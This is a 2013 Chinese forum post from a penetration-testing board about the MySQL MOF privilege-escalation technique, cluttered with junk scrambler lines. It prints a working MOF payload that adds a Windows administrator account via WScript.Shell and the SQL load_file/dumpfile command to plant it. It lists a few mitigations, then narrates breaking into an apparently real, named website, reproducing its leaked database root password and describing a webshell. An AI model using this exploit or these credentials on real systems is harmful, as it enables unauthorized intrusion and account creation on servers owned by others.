中国网络渗透测试联盟
标题:
Mysql mof扩展漏洞实例与防范
[打印本页]
作者:
admin
时间:
2013-1-4 19:49
标题:
Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
) z0 p8 l W8 w* o% Z* H
P. ~" i% \6 `# G9 ^* n0 N4 f
网上公开的一些利用代码:
}; E/ v. E+ [/ c$ ~
+ X5 j3 R' ?- O4 _
#pragma namespace(“\\\\.\\root\\subscription”)
. X, Z' |7 V; S, `- z
; o h0 n! @2 f
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
* @$ S$ B1 u1 u3 x" W3 J
7 n8 f4 ]: I. }; e9 y7 k
( B6 a/ `9 F) {
. M; v0 }) X3 Z; }8 d
/ G1 A7 z. i# e* o0 T
. R8 e6 s6 [2 Q
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
# ?3 N* `, i0 P! L
从上面代码来看得出解决办法:
P9 m+ \" e! `, \$ U
/ k; H6 q4 p2 i5 h: [5 A
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
$ _; f% o/ G- @4 E
( b, \0 A. u5 f& w) @' F
2、禁止使用”WScript.Shel”组件
4 ?3 N- [3 P7 K0 s0 r2 t
4 c ?. y0 M: N$ ~; s; F
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
% }, P2 [) n9 e
; Z" O2 G3 H* l. k' c) N
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
7 S+ b$ S# T2 o. b/ g; t& Z+ n; L
, [" O2 D2 p5 Y; [! o1 E$ W+ d
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
* _( r9 |; j6 X- G0 o! u/ ?( T4 y
) K" K0 G9 E, A, }# J% f2 r, C0 l/ k
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
& K: E9 Z1 G0 ]: O5 {4 C5 W3 h
$ Y6 w7 d( k. K* a' f! v0 T! q
看懂了后就开始练手吧
+ K$ t/ J O1 z7 w1 g& \" {
3 ~" q8 v! k- ^, H/ z: O6 M- [9 Q' ?
http://www.webbmw.com/config/config_ucenter.php
一句话 a
' @( A3 _( {# r; T& v! p
% A3 J. p5 A9 Q- G
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
) z' C3 K" r$ }! L; l- {
% u, f' d. j4 A4 G; S# z5 K |
于是直接用菜刀开搞
$ |# u6 p4 g) ^& g" E: O ~, ^! `- H
2 E( V- z8 g( `
上马先
( j4 q1 P; n6 E8 e
v8 {5 ^% i; e! h% p* B3 |
既然有了那些账号 之类的 于是我们就执行吧…….
+ R' S+ ~6 g! C) m
8 K( t6 ~" X, O6 s: ~
小小的说下
! u# I% u+ j: l' u8 O7 E+ ~4 u
2 @5 N3 z! C& U# e
在这里第1次执行未成功 原因未知
' m& o) E& K8 l0 I O
: q4 i) G9 _/ h; e9 I9 L
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
" o* n# W: o! ~7 T% c1 K
% z9 t9 `" x" W8 T2 N6 ?" n
#pragma namespace(“\\\\.\\root\\subscription”)
: g( ^3 i! S1 Z, k) ~
) C6 h# P2 Y* `* _! I! H7 L0 S
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
6 _3 P& e( G$ C7 u& ] u/ c$ Q$ d9 e
$ p6 w8 N6 F# B3 u7 @; ^6 ?2 @
我是将文件放到C:\WINDOWS\temp\1.mof
B9 T. G$ \: x5 V
7 d; r$ c$ [+ j) N8 x1 O n
所以我们就改下执行的代码
( O5 m; P2 C8 _+ i5 u) r5 T/ A
7 I& l7 A$ k! v$ h9 a+ g
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
% g5 Y9 m3 j! a: N1 h6 Y2 I! P
) `4 f# R2 f0 p/ Z
( p+ m& A2 i c% e2 V6 \
7 c1 L4 Z' ~2 @' c8 G6 a( b; o
但是 你会发现账号还是没有躺在那里。。
9 \* O8 j8 ]1 K: D) A" C! v' `6 r O
u9 ?& r9 E2 r% Q- R3 X: g6 ? h
于是我就感觉蛋疼
, E2 s+ }8 u s
1 u6 f% F2 \) M7 o" r$ s3 D+ E2 l4 h
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
$ L9 P3 x; a9 [- K+ p S
; b1 g+ h T! f, d$ S2 ?# s
1 O7 I7 Q* p( s4 z8 j/ [
7 j2 l6 `/ z1 q( N
但是其他库均不成功…
1 x( `2 z6 |! T# x- [
: N6 J! Y7 b; H* e) `
我就很费解呀 到底为什么不成功求大牛解答…
! v7 `, N% E. m/ R; z4 { o6 w
# m2 \- \/ [+ S* U8 [" c; L1 N4 s
7 H9 F8 X, B. {8 a# ?6 o4 o+ j
1 d( {% T7 }9 `1 {
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2